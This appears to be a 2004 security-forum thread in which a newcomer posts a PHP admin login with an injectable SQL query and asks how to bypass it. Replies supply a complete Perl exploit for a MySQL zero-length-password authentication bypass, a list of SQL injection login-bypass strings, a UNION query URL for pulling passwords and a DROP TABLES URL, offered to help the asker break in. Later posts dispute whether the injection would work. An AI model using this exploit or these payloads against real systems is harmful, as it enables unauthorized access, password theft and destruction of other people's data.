|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 112
Members: 0
Total: 112
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Bypass authentication |
|
Posted: Tue Jul 13, 2004 5:16 pm |
|
|
rafaelfpviana |
Beginner |
|
|
Joined: Jun 27, 2004 |
Posts: 1 |
|
|
|
|
|
|
|
how could I bypass this:
Login form:
Code: |
<p style='margin-left: 5; margin-right: 5'>
<font face='Verdana' size='2'>You are not logged.<br>
<br><form ACTION='index.php' method=post><input type="hidden" name="PHPSESSID" value="44c54761b5ff0ae5bb43bc8cbda6fd45" />
<input type='hidden' name='on' value='2'>
<p align='center'><font face='Verdana' size='1'>:: Admin ::</font></p>
<div align='center'>
<center>
<table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='25%' id='AutoNumber1'>
<tr>
<td width='100%' colspan='2' bgcolor='#CCFFFF'>
<p style='margin-top: 2; margin-bottom: 2' align='center'>
<font size='1' face='Verdana'>Login</font></td>
</tr>
<tr>
<td width='15%'>
<p style='margin-left: 2; margin-top: 2; margin-bottom: 2'>
<font size='1' face='Verdana'>Login:</font></td>
<td width='50%'>
<p style='margin-left: 2; margin-top: 2; margin-bottom: 2'><font color=''>
<input type='text' name='id' size=10 style='font-family: ; font-size: 8 pt; background-color: #FFFFFF; border-style: solid; border-width: 1'></font></td>
</tr>
<tr>
<td width='15%'>
<p style='margin-left: 2; margin-top: 2; margin-bottom: 2'>
<font size='1' face='Verdana'>Password:</font></td>
<td width='50%'>
<p style='margin-left: 2; margin-top: 2; margin-bottom: 2'><font color=''>
<input type='password' name='passwd' size=20 style='font-family: ; font-size: 8 pt; background-color: #FFFFFF; border-style: solid; border-width: 1'></font></td>
</tr>
<tr>
<td width='100%' colspan='2' bgcolor='#CCFFFF'>
<p align='center' style='margin-top: 2; margin-bottom: 2'>
<input type='submit' value=' Login ' name='Submit' style='border-style:solid; border-width:1px; font-family: ; font-size: 8 pt; '></td>
</tr>
</table>
</center>
</div>
</form>
|
This is the code that validates:
Code: |
session_start();
include "../config.inc.php";
if ($id && $passwd)
{
$query = "select * from admin where id='$id' and passwd='$passwd'";
$result = mysql_query($query);
if (mysql_num_rows($result) > 0 )
{
$valid_admin = $id;
session_register("valid_admin");
}
}
if (session_is_registered("valid_admin"))
{
include "admin.php";
}
else
{
if (isset($id))
{
echo "<p style='margin-left: 5; margin-right: 5'>
<font face='Verdana' size='2' color='#ff0000'>login or password incorrect</font>";
}
else
{
echo "<p style='margin-left: 5; margin-right: 5'>
<font face='Verdana' size='2'>You are not logged.<br>";
}
echo "$HERE IS THE FORM THAT I PUT ON THE TOP ";
}
|
Thanks for the help people.
If you guys think that is something missing just tell me. |
|
_________________ No signature... |
|
|
|
|
|
|
|
Posted: Tue Jul 13, 2004 9:32 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
war game ???
mysql bypass
Code: | #!/usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# <elik@beyondsecurity.com>
#
use strict;
use IO::Socket::INET;
usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
usage();
}
my $port = shift(@ARGV);
if (!$port)
{
$port = 3306; print "Using default MySQL port (3306)\n";
}
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
print "Not allowed to connect to MySQL!\n";
exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";
# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";
# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));
# send login caps packet with password
my $packet = "\x85\xa6".
"\x03\x00\x00".
"\x00".
"\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0;
# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);
my @list_bytes = unpack("C*", $reply);
#print "The fifth byte is: ", $list_bytes[4], "\n";
if (length(@list_bytes) >= 4)
{
print "Response insufficent\n";
}
#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
print "Received OK reply, authentication successful!!\n";
}
else
{
print "Authentication failed!\n";
}
# close
close($socket);
sub usage
{
# print usage information
print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
<username> - The DB username to authenticate as
<host> - The host to connect to
[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
exit(1);
}
###
# do a hexdump of a string (assuming it's binary)
###
sub HexDump
{
my $buffer = $_[0];
# unpack it into chars
my @up = unpack("C*", $buffer);
my $pos=0;
# calculate matrix sizes
my $rows = int(@up/16);
my $leftover = int(@up%16);
for( my $row=0; $row < $rows ; $row++, $pos+=16)
{
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+15];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
# print last line
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+$leftover-1];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
|
Save to .pl (Perl script) |
|
|
|
|
|
|
hey there |
|
Posted: Fri Jul 16, 2004 8:19 am |
|
|
icenix |
Advanced user |
|
|
Joined: May 13, 2004 |
Posts: 106 |
Location: Australia |
|
|
|
|
|
|
hey there buddy, looks like we got a classic case of SQL Injection
Code: |
$query = "select * from admin where id='$id' and passwd='$passwd'";
|
not sure who wrote this but he shouldnt of made it open source :/
I THINK that this can be exploited pretty easily.
because $id and $passwd are completly unsanitized..
perfect evasion:
you can use one of these two techniques to bypass:
A: you can bypass the login by deeming it "TRUE"
by putting as User ID:
Code: |
' or 0=0 --
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
|
try some of them
(someone correct me if im wrong, this should work or something similar)
OR B: Extract the password from the database which would require you to have some knowledge of the database.
try something like:
Code: |
http://thesite.com/thelogin.php?id=' UNION ALL SELECT user_password FROM the_database WHERE "='
|
OR C ( hehehe ) : you can fuck the site to hell by dropping all the tables
Code: |
http://thesite.com/thelogin.php?id=' ; DROP TABLES WHERE "='
|
im doing all this from memory and no doubt i might of missed something but yeah
good luck on your little hacking trip
any more questions just come back and ask |
|
|
|
|
|
|
Re: hey there |
|
Posted: Sun Jul 25, 2004 12:52 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
icenix wrote: | hey there buddy, looks like we got a classic case of SQL Injection
Code: |
$query = "select * from admin where id='$id' and passwd='$passwd'";
|
not sure who wrote this but he shouldnt of made it open source :/
I THINK that this can be exploited pretty easily.
because $id and $passwd are completly unsanitized..
perfect evasion:
you can use one of these two techniques to bypass:
A: you can bypass the login by deeming it "TRUE"
by putting as User ID:
Code: |
' or 0=0 --
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
|
try some of them
(someone correct me if im wrong, this should work or something similar)
OR B: Extract the password from the database which would require you to have some knowledge of the database.
try something like:
Code: |
http://thesite.com/thelogin.php?id=' UNION ALL SELECT user_password FROM the_database WHERE "='
|
OR C ( hehehe ) : you can xxxx the site to hell by dropping all the tables
Code: |
http://thesite.com/thelogin.php?id=' ; DROP TABLES WHERE "='
|
im doing all this from memory and no doubt i might of missed something but yeah
good luck on your little hacking trip
any more questions just come back and ask |
First of all, in case of php and mysql, there is "magic_quotes" enabled with ~100% probability. So no sql injection here
And one more thing - mysql does not support multiple sql queries through php scripts, so forget about "... ; DROP TABLE ..." |
|
|
|
|
|
|
lol |
|
Posted: Mon Jul 26, 2004 10:11 pm |
|
|
icenix |
Advanced user |
|
|
Joined: May 13, 2004 |
Posts: 106 |
Location: Australia |
|
|
|
|
|
|
hahah well there you go
told you i was unsure lol
sorry but glad to see you got your answer. |
|
|
|
|
|
Re: hey there |
|
Posted: Mon Aug 23, 2004 7:44 am |
|
|
bima |
Regular user |
|
|
Joined: Jun 14, 2004 |
Posts: 16 |
Location: dunia fana |
|
|
|
|
|
|
Quote: |
And one more thing - mysql does not support multiple sql queries through php scripts, so forget about "... ; DROP TABLE ..." |
u right , maybe the next mysql version have this feature,
so the multiple sql queries can be executed like mssql...
|
|
|
|
|
|
Re: hey there |
|
Posted: Mon Aug 23, 2004 6:36 pm |
|
|
madman |
Active user |
|
|
Joined: May 24, 2004 |
Posts: 46 |
|
|
|
|
|
|
|
bima wrote: | u right , maybe the next mysql version have this feature,
so the multiple sql queries can be executed like mssql... |
Well, mysql indeed support multi queries separated with semicolon chars. But server-side parsers (like PHP) always stripping first match semicolon separator and all commands after. |
|
_________________ ch88rs,
madman |
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|